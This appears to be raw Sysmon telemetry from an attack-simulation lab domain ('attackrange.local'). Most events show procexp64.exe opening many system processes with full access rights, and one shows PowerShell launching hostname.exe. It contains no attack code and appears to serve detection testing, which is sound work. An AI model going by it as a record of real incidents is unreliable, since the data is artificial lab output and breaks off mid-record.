15:16:47.267{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790712Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.267{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790711Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.267{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790710Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.267{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-325F-6010-D6A2-00000000A301}5392C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000790709Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.267{732C744F-31A3-6010-A2A2-00000000A301}7260604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{732C744F-325F-6010-D6A2-00000000A301}5392C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22bd0a1b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220718a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071576|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22b22bdb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2203210c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220905db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073ad1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22065a56|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071f89|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071b25|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220718a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071576|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22b22bdb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2203210c 154100x8000000000000000790708Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.277{732C744F-325F-6010-D6A2-00000000A301}5392C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000790849Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790848Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790847Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790846Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790845Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790844Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790843Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790842Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790841Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790840Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790839Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790838Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790837Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790836Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790835Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790834Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790833Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790832Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790831Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790830Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790829Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790828Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790827Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790826Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790825Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790824Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790823Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program 